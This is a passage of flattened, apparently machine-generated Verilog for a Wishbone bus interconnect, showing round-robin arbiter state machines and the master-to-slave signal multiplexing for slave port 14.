                    if ( s14_msel_arb2_req[6] ) 
                    begin
                        s14_msel_arb2_next_state = s14_msel_arb2_grant6;
                    end
                    else
                    begin 
                        if ( s14_msel_arb2_req[7] ) 
                        begin
                            s14_msel_arb2_next_state = s14_msel_arb2_grant7;
                        end
                        else
                        begin 
                            if ( s14_msel_arb2_req[0] ) 
                            begin
                                s14_msel_arb2_next_state = s14_msel_arb2_grant0;
                            end
                            else
                            begin 
                                if ( s14_msel_arb2_req[1] ) 
                                begin
                                    s14_msel_arb2_next_state = s14_msel_arb2_grant1;
                                end
                                else
                                begin 
                                    if ( s14_msel_arb2_req[2] ) 
                                    begin
                                        s14_msel_arb2_next_state = s14_msel_arb2_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s14_msel_arb2_req[3] ) 
                                        begin
                                            s14_msel_arb2_next_state = s14_msel_arb2_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s14_msel_arb2_grant5:
        begin
            if (  !( s14_msel_arb2_req[5]) | 1'b0 ) 
            begin
                if ( s14_msel_arb2_req[6] ) 
                begin
                    s14_msel_arb2_next_state = s14_msel_arb2_grant6;
                end
                else
                begin 
                    if ( s14_msel_arb2_req[7] ) 
                    begin
                        s14_msel_arb2_next_state = s14_msel_arb2_grant7;
                    end
                    else
                    begin 
                        if ( s14_msel_arb2_req[0] ) 
                        begin
                            s14_msel_arb2_next_state = s14_msel_arb2_grant0;
                        end
                        else
                        begin 
                            if ( s14_msel_arb2_req[1] ) 
                            begin
                                s14_msel_arb2_next_state = s14_msel_arb2_grant1;
                            end
                            else
                            begin 
                                if ( s14_msel_arb2_req[2] ) 
                                begin
                                    s14_msel_arb2_next_state = s14_msel_arb2_grant2;
                                end
                                else
                                begin 
                                    if ( s14_msel_arb2_req[3] ) 
                                    begin
                                        s14_msel_arb2_next_state = s14_msel_arb2_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s14_msel_arb2_req[4] ) 
                                        begin
                                            s14_msel_arb2_next_state = s14_msel_arb2_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s14_msel_arb2_grant6:
        begin
            if (  !( s14_msel_arb2_req[6]) | 1'b0 ) 
            begin
                if ( s14_msel_arb2_req[7] ) 
                begin
                    s14_msel_arb2_next_state = s14_msel_arb2_grant7;
                end
                else
                begin 
                    if ( s14_msel_arb2_req[0] ) 
                    begin
                        s14_msel_arb2_next_state = s14_msel_arb2_grant0;
                    end
                    else
                    begin 
                        if ( s14_msel_arb2_req[1] ) 
                        begin
                            s14_msel_arb2_next_state = s14_msel_arb2_grant1;
                        end
                        else
                        begin 
                            if ( s14_msel_arb2_req[2] ) 
                            begin
                                s14_msel_arb2_next_state = s14_msel_arb2_grant2;
                            end
                            else
                            begin 
                                if ( s14_msel_arb2_req[3] ) 
                                begin
                                    s14_msel_arb2_next_state = s14_msel_arb2_grant3;
                                end
                                else
                                begin 
                                    if ( s14_msel_arb2_req[4] ) 
                                    begin
                                        s14_msel_arb2_next_state = s14_msel_arb2_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s14_msel_arb2_req[5] ) 
                                        begin
                                            s14_msel_arb2_next_state = s14_msel_arb2_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s14_msel_arb2_grant7:
        begin
            if (  !( s14_msel_arb2_req[7]) | 1'b0 ) 
            begin
                if ( s14_msel_arb2_req[0] ) 
                begin
                    s14_msel_arb2_next_state = s14_msel_arb2_grant0;
                end
                else
                begin 
                    if ( s14_msel_arb2_req[1] ) 
                    begin
                        s14_msel_arb2_next_state = s14_msel_arb2_grant1;
                    end
                    else
                    begin 
                        if ( s14_msel_arb2_req[2] ) 
                        begin
                            s14_msel_arb2_next_state = s14_msel_arb2_grant2;
                        end
                        else
                        begin 
                            if ( s14_msel_arb2_req[3] ) 
                            begin
                                s14_msel_arb2_next_state = s14_msel_arb2_grant3;
                            end
                            else
                            begin 
                                if ( s14_msel_arb2_req[4] ) 
                                begin
                                    s14_msel_arb2_next_state = s14_msel_arb2_grant4;
                                end
                                else
                                begin 
                                    if ( s14_msel_arb2_req[5] ) 
                                    begin
                                        s14_msel_arb2_next_state = s14_msel_arb2_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s14_msel_arb2_req[6] ) 
                                        begin
                                            s14_msel_arb2_next_state = s14_msel_arb2_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    assign s14_msel_arb3_req = { ( s14_msel_req[7] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[15] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[14] ) ) } == 2'd3 ) ), ( s14_msel_req[6] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[13] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[12] ) ) } == 2'd3 ) ), ( s14_msel_req[5] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[11] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[10] ) ) } == 2'd3 ) ), ( s14_msel_req[4] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[9] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[8] ) ) } == 2'd3 ) ), ( s14_msel_req[3] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[7] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[6] ) ) } == 2'd3 ) ), ( s14_msel_req[2] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[5] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[4] ) ) } == 2'd3 ) ), ( s14_msel_req[1] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[3] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[2] ) ) } == 2'd3 ) ), ( s14_msel_req[0] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[1] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[0] ) ) } == 2'd3 ) ) };
    always @ (  posedge clk_i or  posedge rst_i)
    begin
        if ( rst_i ) 
        begin
            s14_msel_arb3_state <= s14_msel_arb3_grant0;
        end
        else
        begin 
            s14_msel_arb3_state <= s14_msel_arb3_next_state;
        end
    end
    always @ (  s14_msel_arb3_state or  { ( s14_msel_req[7] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[15] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[14] ) ) } == 2'd3 ) ), ( s14_msel_req[6] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[13] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[12] ) ) } == 2'd3 ) ), ( s14_msel_req[5] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[11] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[10] ) ) } == 2'd3 ) ), ( s14_msel_req[4] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[9] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[8] ) ) } == 2'd3 ) ), ( s14_msel_req[3] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[7] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[6] ) ) } == 2'd3 ) ), ( s14_msel_req[2] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[5] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[4] ) ) } == 2'd3 ) ), ( s14_msel_req[1] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[3] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[2] ) ) } == 2'd3 ) ), ( s14_msel_req[0] & ( { ( ( ( s14_msel_pri_sel == 2'd2 ) ) ? ( rf_conf14[1] ) : ( 1'b0 ) ), ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( 1'b0 ) : ( rf_conf14[0] ) ) } == 2'd3 ) ) } or  1'b0)
    begin
        s14_msel_arb3_next_state = s14_msel_arb3_state;
        case ( s14_msel_arb3_state ) 
        s14_msel_arb3_grant0:
        begin
            if (  !( s14_msel_arb3_req[0]) | 1'b0 ) 
            begin
                if ( s14_msel_arb3_req[1] ) 
                begin
                    s14_msel_arb3_next_state = s14_msel_arb3_grant1;
                end
                else
                begin 
                    if ( s14_msel_arb3_req[2] ) 
                    begin
                        s14_msel_arb3_next_state = s14_msel_arb3_grant2;
                    end
                    else
                    begin 
                        if ( s14_msel_arb3_req[3] ) 
                        begin
                            s14_msel_arb3_next_state = s14_msel_arb3_grant3;
                        end
                        else
                        begin 
                            if ( s14_msel_arb3_req[4] ) 
                            begin
                                s14_msel_arb3_next_state = s14_msel_arb3_grant4;
                            end
                            else
                            begin 
                                if ( s14_msel_arb3_req[5] ) 
                                begin
                                    s14_msel_arb3_next_state = s14_msel_arb3_grant5;
                                end
                                else
                                begin 
                                    if ( s14_msel_arb3_req[6] ) 
                                    begin
                                        s14_msel_arb3_next_state = s14_msel_arb3_grant6;
                                    end
                                    else
                                    begin 
                                        if ( s14_msel_arb3_req[7] ) 
                                        begin
                                            s14_msel_arb3_next_state = s14_msel_arb3_grant7;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s14_msel_arb3_grant1:
        begin
            if (  !( s14_msel_arb3_req[1]) | 1'b0 ) 
            begin
                if ( s14_msel_arb3_req[2] ) 
                begin
                    s14_msel_arb3_next_state = s14_msel_arb3_grant2;
                end
                else
                begin 
                    if ( s14_msel_arb3_req[3] ) 
                    begin
                        s14_msel_arb3_next_state = s14_msel_arb3_grant3;
                    end
                    else
                    begin 
                        if ( s14_msel_arb3_req[4] ) 
                        begin
                            s14_msel_arb3_next_state = s14_msel_arb3_grant4;
                        end
                        else
                        begin 
                            if ( s14_msel_arb3_req[5] ) 
                            begin
                                s14_msel_arb3_next_state = s14_msel_arb3_grant5;
                            end
                            else
                            begin 
                                if ( s14_msel_arb3_req[6] ) 
                                begin
                                    s14_msel_arb3_next_state = s14_msel_arb3_grant6;
                                end
                                else
                                begin 
                                    if ( s14_msel_arb3_req[7] ) 
                                    begin
                                        s14_msel_arb3_next_state = s14_msel_arb3_grant7;
                                    end
                                    else
                                    begin 
                                        if ( s14_msel_arb3_req[0] ) 
                                        begin
                                            s14_msel_arb3_next_state = s14_msel_arb3_grant0;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s14_msel_arb3_grant2:
        begin
            if (  !( s14_msel_arb3_req[2]) | 1'b0 ) 
            begin
                if ( s14_msel_arb3_req[3] ) 
                begin
                    s14_msel_arb3_next_state = s14_msel_arb3_grant3;
                end
                else
                begin 
                    if ( s14_msel_arb3_req[4] ) 
                    begin
                        s14_msel_arb3_next_state = s14_msel_arb3_grant4;
                    end
                    else
                    begin 
                        if ( s14_msel_arb3_req[5] ) 
                        begin
                            s14_msel_arb3_next_state = s14_msel_arb3_grant5;
                        end
                        else
                        begin 
                            if ( s14_msel_arb3_req[6] ) 
                            begin
                                s14_msel_arb3_next_state = s14_msel_arb3_grant6;
                            end
                            else
                            begin 
                                if ( s14_msel_arb3_req[7] ) 
                                begin
                                    s14_msel_arb3_next_state = s14_msel_arb3_grant7;
                                end
                                else
                                begin 
                                    if ( s14_msel_arb3_req[0] ) 
                                    begin
                                        s14_msel_arb3_next_state = s14_msel_arb3_grant0;
                                    end
                                    else
                                    begin 
                                        if ( s14_msel_arb3_req[1] ) 
                                        begin
                                            s14_msel_arb3_next_state = s14_msel_arb3_grant1;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s14_msel_arb3_grant3:
        begin
            if (  !( s14_msel_arb3_req[3]) | 1'b0 ) 
            begin
                if ( s14_msel_arb3_req[4] ) 
                begin
                    s14_msel_arb3_next_state = s14_msel_arb3_grant4;
                end
                else
                begin 
                    if ( s14_msel_arb3_req[5] ) 
                    begin
                        s14_msel_arb3_next_state = s14_msel_arb3_grant5;
                    end
                    else
                    begin 
                        if ( s14_msel_arb3_req[6] ) 
                        begin
                            s14_msel_arb3_next_state = s14_msel_arb3_grant6;
                        end
                        else
                        begin 
                            if ( s14_msel_arb3_req[7] ) 
                            begin
                                s14_msel_arb3_next_state = s14_msel_arb3_grant7;
                            end
                            else
                            begin 
                                if ( s14_msel_arb3_req[0] ) 
                                begin
                                    s14_msel_arb3_next_state = s14_msel_arb3_grant0;
                                end
                                else
                                begin 
                                    if ( s14_msel_arb3_req[1] ) 
                                    begin
                                        s14_msel_arb3_next_state = s14_msel_arb3_grant1;
                                    end
                                    else
                                    begin 
                                        if ( s14_msel_arb3_req[2] ) 
                                        begin
                                            s14_msel_arb3_next_state = s14_msel_arb3_grant2;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s14_msel_arb3_grant4:
        begin
            if (  !( s14_msel_arb3_req[4]) | 1'b0 ) 
            begin
                if ( s14_msel_arb3_req[5] ) 
                begin
                    s14_msel_arb3_next_state = s14_msel_arb3_grant5;
                end
                else
                begin 
                    if ( s14_msel_arb3_req[6] ) 
                    begin
                        s14_msel_arb3_next_state = s14_msel_arb3_grant6;
                    end
                    else
                    begin 
                        if ( s14_msel_arb3_req[7] ) 
                        begin
                            s14_msel_arb3_next_state = s14_msel_arb3_grant7;
                        end
                        else
                        begin 
                            if ( s14_msel_arb3_req[0] ) 
                            begin
                                s14_msel_arb3_next_state = s14_msel_arb3_grant0;
                            end
                            else
                            begin 
                                if ( s14_msel_arb3_req[1] ) 
                                begin
                                    s14_msel_arb3_next_state = s14_msel_arb3_grant1;
                                end
                                else
                                begin 
                                    if ( s14_msel_arb3_req[2] ) 
                                    begin
                                        s14_msel_arb3_next_state = s14_msel_arb3_grant2;
                                    end
                                    else
                                    begin 
                                        if ( s14_msel_arb3_req[3] ) 
                                        begin
                                            s14_msel_arb3_next_state = s14_msel_arb3_grant3;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s14_msel_arb3_grant5:
        begin
            if (  !( s14_msel_arb3_req[5]) | 1'b0 ) 
            begin
                if ( s14_msel_arb3_req[6] ) 
                begin
                    s14_msel_arb3_next_state = s14_msel_arb3_grant6;
                end
                else
                begin 
                    if ( s14_msel_arb3_req[7] ) 
                    begin
                        s14_msel_arb3_next_state = s14_msel_arb3_grant7;
                    end
                    else
                    begin 
                        if ( s14_msel_arb3_req[0] ) 
                        begin
                            s14_msel_arb3_next_state = s14_msel_arb3_grant0;
                        end
                        else
                        begin 
                            if ( s14_msel_arb3_req[1] ) 
                            begin
                                s14_msel_arb3_next_state = s14_msel_arb3_grant1;
                            end
                            else
                            begin 
                                if ( s14_msel_arb3_req[2] ) 
                                begin
                                    s14_msel_arb3_next_state = s14_msel_arb3_grant2;
                                end
                                else
                                begin 
                                    if ( s14_msel_arb3_req[3] ) 
                                    begin
                                        s14_msel_arb3_next_state = s14_msel_arb3_grant3;
                                    end
                                    else
                                    begin 
                                        if ( s14_msel_arb3_req[4] ) 
                                        begin
                                            s14_msel_arb3_next_state = s14_msel_arb3_grant4;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s14_msel_arb3_grant6:
        begin
            if (  !( s14_msel_arb3_req[6]) | 1'b0 ) 
            begin
                if ( s14_msel_arb3_req[7] ) 
                begin
                    s14_msel_arb3_next_state = s14_msel_arb3_grant7;
                end
                else
                begin 
                    if ( s14_msel_arb3_req[0] ) 
                    begin
                        s14_msel_arb3_next_state = s14_msel_arb3_grant0;
                    end
                    else
                    begin 
                        if ( s14_msel_arb3_req[1] ) 
                        begin
                            s14_msel_arb3_next_state = s14_msel_arb3_grant1;
                        end
                        else
                        begin 
                            if ( s14_msel_arb3_req[2] ) 
                            begin
                                s14_msel_arb3_next_state = s14_msel_arb3_grant2;
                            end
                            else
                            begin 
                                if ( s14_msel_arb3_req[3] ) 
                                begin
                                    s14_msel_arb3_next_state = s14_msel_arb3_grant3;
                                end
                                else
                                begin 
                                    if ( s14_msel_arb3_req[4] ) 
                                    begin
                                        s14_msel_arb3_next_state = s14_msel_arb3_grant4;
                                    end
                                    else
                                    begin 
                                        if ( s14_msel_arb3_req[5] ) 
                                        begin
                                            s14_msel_arb3_next_state = s14_msel_arb3_grant5;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        s14_msel_arb3_grant7:
        begin
            if (  !( s14_msel_arb3_req[7]) | 1'b0 ) 
            begin
                if ( s14_msel_arb3_req[0] ) 
                begin
                    s14_msel_arb3_next_state = s14_msel_arb3_grant0;
                end
                else
                begin 
                    if ( s14_msel_arb3_req[1] ) 
                    begin
                        s14_msel_arb3_next_state = s14_msel_arb3_grant1;
                    end
                    else
                    begin 
                        if ( s14_msel_arb3_req[2] ) 
                        begin
                            s14_msel_arb3_next_state = s14_msel_arb3_grant2;
                        end
                        else
                        begin 
                            if ( s14_msel_arb3_req[3] ) 
                            begin
                                s14_msel_arb3_next_state = s14_msel_arb3_grant3;
                            end
                            else
                            begin 
                                if ( s14_msel_arb3_req[4] ) 
                                begin
                                    s14_msel_arb3_next_state = s14_msel_arb3_grant4;
                                end
                                else
                                begin 
                                    if ( s14_msel_arb3_req[5] ) 
                                    begin
                                        s14_msel_arb3_next_state = s14_msel_arb3_grant5;
                                    end
                                    else
                                    begin 
                                        if ( s14_msel_arb3_req[6] ) 
                                        begin
                                            s14_msel_arb3_next_state = s14_msel_arb3_grant6;
                                        end
                                    end
                                end
                            end
                        end
                    end
                end
            end
        end
        endcase
    end
    always @ (  s14_msel_pri_out or  s14_msel_arb0_state or  s14_msel_arb1_state)
    begin
        if ( s14_msel_pri_out[0] ) 
        begin
            s14_msel_sel1 = s14_msel_arb1_state;
        end
        else
        begin 
            s14_msel_sel1 = s14_msel_arb0_state;
        end
    end
    always @ (  s14_msel_pri_out or  s14_msel_arb0_state or  s14_msel_arb1_state or  s14_msel_arb2_state or  s14_msel_arb3_state)
    begin
        case ( s14_msel_pri_out ) 
        2'd0:
        begin
            s14_msel_sel2 = s14_msel_arb0_state;
        end
        2'd1:
        begin
            s14_msel_sel2 = s14_msel_arb1_state;
        end
        2'd2:
        begin
            s14_msel_sel2 = s14_msel_arb2_state;
        end
        2'd3:
        begin
            s14_msel_sel2 = s14_msel_arb3_state;
        end
        endcase
    end
    assign s14_mast_sel = ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) );
    always @ (  ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) or  m0_wb_addr_i or  m1_wb_addr_i or  m2_wb_addr_i or  m3_wb_addr_i or  m4_wb_addr_i or  m5_wb_addr_i or  m6_wb_addr_i or  m7_wb_addr_i)
    begin
        case ( ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s14_wb_addr_o = m0_wb_addr_i;
        end
        3'd1:
        begin
            s14_wb_addr_o = m1_wb_addr_i;
        end
        3'd2:
        begin
            s14_wb_addr_o = m2_wb_addr_i;
        end
        3'd3:
        begin
            s14_wb_addr_o = m3_wb_addr_i;
        end
        3'd4:
        begin
            s14_wb_addr_o = m4_wb_addr_i;
        end
        3'd5:
        begin
            s14_wb_addr_o = m5_wb_addr_i;
        end
        3'd6:
        begin
            s14_wb_addr_o = m6_wb_addr_i;
        end
        3'd7:
        begin
            s14_wb_addr_o = m7_wb_addr_i;
        end
        endcase
    end
    always @ (  ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) or  m0_wb_sel_i or  m1_wb_sel_i or  m2_wb_sel_i or  m3_wb_sel_i or  m4_wb_sel_i or  m5_wb_sel_i or  m6_wb_sel_i or  m7_wb_sel_i)
    begin
        case ( ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s14_wb_sel_o = m0_wb_sel_i;
        end
        3'd1:
        begin
            s14_wb_sel_o = m1_wb_sel_i;
        end
        3'd2:
        begin
            s14_wb_sel_o = m2_wb_sel_i;
        end
        3'd3:
        begin
            s14_wb_sel_o = m3_wb_sel_i;
        end
        3'd4:
        begin
            s14_wb_sel_o = m4_wb_sel_i;
        end
        3'd5:
        begin
            s14_wb_sel_o = m5_wb_sel_i;
        end
        3'd6:
        begin
            s14_wb_sel_o = m6_wb_sel_i;
        end
        3'd7:
        begin
            s14_wb_sel_o = m7_wb_sel_i;
        end
        endcase
    end
    always @ (  ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) or  m0_wb_data_i or  m1_wb_data_i or  m2_wb_data_i or  m3_wb_data_i or  m4_wb_data_i or  m5_wb_data_i or  m6_wb_data_i or  m7_wb_data_i)
    begin
        case ( ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s14_wb_data_o = m0_wb_data_i;
        end
        3'd1:
        begin
            s14_wb_data_o = m1_wb_data_i;
        end
        3'd2:
        begin
            s14_wb_data_o = m2_wb_data_i;
        end
        3'd3:
        begin
            s14_wb_data_o = m3_wb_data_i;
        end
        3'd4:
        begin
            s14_wb_data_o = m4_wb_data_i;
        end
        3'd5:
        begin
            s14_wb_data_o = m5_wb_data_i;
        end
        3'd6:
        begin
            s14_wb_data_o = m6_wb_data_i;
        end
        3'd7:
        begin
            s14_wb_data_o = m7_wb_data_i;
        end
        endcase
    end
    assign s14_m0_data_o = s14_data_i;
    assign s14_m1_data_o = s14_data_i;
    assign s14_m2_data_o = s14_data_i;
    assign s14_m3_data_o = s14_data_i;
    assign s14_m4_data_o = s14_data_i;
    assign s14_m5_data_o = s14_data_i;
    assign s14_m6_data_o = s14_data_i;
    assign s14_m7_data_o = s14_data_i;
    always @ (  ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) or  m0_wb_we_i or  m1_wb_we_i or  m2_wb_we_i or  m3_wb_we_i or  m4_wb_we_i or  m5_wb_we_i or  m6_wb_we_i or  m7_wb_we_i)
    begin
        case ( ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s14_wb_we_o = m0_wb_we_i;
        end
        3'd1:
        begin
            s14_wb_we_o = m1_wb_we_i;
        end
        3'd2:
        begin
            s14_wb_we_o = m2_wb_we_i;
        end
        3'd3:
        begin
            s14_wb_we_o = m3_wb_we_i;
        end
        3'd4:
        begin
            s14_wb_we_o = m4_wb_we_i;
        end
        3'd5:
        begin
            s14_wb_we_o = m5_wb_we_i;
        end
        3'd6:
        begin
            s14_wb_we_o = m6_wb_we_i;
        end
        3'd7:
        begin
            s14_wb_we_o = m7_wb_we_i;
        end
        endcase
    end
    always @ (  posedge clk_i)
    begin
        s14_m0_cyc_r <= m0_s14_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s14_m1_cyc_r <= m1_s14_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s14_m2_cyc_r <= m2_s14_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s14_m3_cyc_r <= m3_s14_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s14_m4_cyc_r <= m4_s14_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s14_m5_cyc_r <= m5_s14_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s14_m6_cyc_r <= m6_s14_cyc_o;
    end
    always @ (  posedge clk_i)
    begin
        s14_m7_cyc_r <= m7_s14_cyc_o;
    end
    always @ (  ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) or  m0_s14_cyc_o or  m1_s14_cyc_o or  m2_s14_cyc_o or  m3_s14_cyc_o or  m4_s14_cyc_o or  m5_s14_cyc_o or  m6_s14_cyc_o or  m7_s14_cyc_o or  s14_m0_cyc_r or  s14_m1_cyc_r or  s14_m2_cyc_r or  s14_m3_cyc_r or  s14_m4_cyc_r or  s14_m5_cyc_r or  s14_m6_cyc_r or  s14_m7_cyc_r)
    begin
        case ( ( ( ( s14_pri_sel == 2'd0 ) ) ? ( s14_arb_state ) : ( ( ( ( s14_msel_pri_sel == 2'd0 ) ) ? ( s14_msel_arb0_state ) : ( ( ( ( s14_msel_pri_sel == 2'd1 ) ) ? ( s14_msel_sel1 ) : ( s14_msel_sel2 ) ) ) ) ) ) ) 
        3'd0:
        begin
            s14_wb_cyc_o = ( m0_s14_cyc_o & s14_m0_cyc_r );
        end
        3'd1:
        begin
            s14_wb_cyc_o = ( m1_s14_cyc_o & s14_m1_cyc_r );
        end
        3'd2:
        begin
            s14_wb_cyc_o = ( m2_s14_cyc_o & s14_m2_cyc_r );
        end
        3'd3:
        begin
            s14_wb_cyc_o = ( m3_s14_cyc_o & s14_m3_cyc_r );
        end
        3'd4:
        begin
            s14_wb_cyc_o = ( m4_s14_cyc_o & s14_m4_cyc_r );
        end
        3'd5:
        begin
            s14_wb_cyc_o = ( m5_s14_cyc_o & s14_m5_cyc_r );
        end
        3'd6:
        begin
            s14_wb_cyc_o = ( m6_s14_cyc_o & s14_m6_cyc_r );
        end
        3'd7:
        begin
            s14_wb_cyc_o = ( m7_s14_cyc_o & s14_m7_cyc_r );
        end
        endcase
    end
